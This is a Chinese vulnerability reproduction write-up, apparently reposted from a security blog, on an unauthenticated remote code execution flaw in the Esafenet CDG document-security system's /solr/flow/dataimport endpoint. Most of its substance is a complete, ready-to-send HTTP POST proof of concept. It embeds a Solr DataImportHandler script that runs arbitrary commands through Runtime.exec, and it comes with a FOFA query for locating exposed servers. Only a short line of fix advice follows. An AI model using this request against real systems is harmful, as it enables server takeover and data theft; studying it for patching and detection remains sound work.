免責(zé)聲明:請勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無關(guān)。該文章僅供學(xué)習(xí)用途使用。
一、 產(chǎn)品簡介
億賽通電子文檔安全管理系統(tǒng)(簡稱:CDG)是一款電子文檔安全加密軟件,該系統(tǒng)利用驅(qū)動層透明加密技術(shù),通過對電子文檔的加密保護(hù),防止內(nèi)部員工泄密和外部人員非法竊取企業(yè)核心重要數(shù)據(jù)資產(chǎn),對電子文檔進(jìn)行全生命周期防護(hù),系統(tǒng)具有透明加密、主動加密、智能加密等多種加密方式,用戶可根據(jù)部門涉密程度的不同(如核心部門和普通部門),部署力度輕重不一的梯度式文檔加密防護(hù),實(shí)現(xiàn)技術(shù)、管理、審計(jì)進(jìn)行有機(jī)的結(jié)合,在內(nèi)部構(gòu)建起立體化的整體信息防泄露體系,使得成本、效率和安全三者達(dá)到平衡,實(shí)現(xiàn)電子文檔的數(shù)據(jù)安全。
二、 漏洞概述
億賽通電子文檔安全管理系統(tǒng)/solr/flow/dataimport接口處存在遠(yuǎn)程代碼執(zhí)行漏洞,未經(jīng)授權(quán)的攻擊者可通過此漏洞執(zhí)行任意指令,從而獲取服務(wù)器權(quán)限。
三、 復(fù)現(xiàn)環(huán)境
FOFA:app=“億賽通-電子文檔安全管理系統(tǒng)”
四、 漏洞復(fù)現(xiàn)
burp抓包發(fā)送的POC數(shù)據(jù)
POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22執(zhí)行的命令%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: your-ip
<?xml version="1.0" encoding="UTF-8"?>
<RDF>
<item/>
</RDF>
burp成功回顯截圖
ceye后臺查看
小龍POC檢測:
說明一下,由于監(jiān)管強(qiáng)制要求,POC要等護(hù)網(wǎng)后才能開放
小龍POC傳送門: 小龍POC工具
文章來源:http://www.zghlxwxcb.cn/news/detail-663396.html
五、 修復(fù)建議
設(shè)置安全組僅對可信地址開放
升級至安全版本文章來源地址http://www.zghlxwxcb.cn/news/detail-663396.html
到了這里,關(guān)于億賽通電子文檔安全管理系統(tǒng) RCE漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!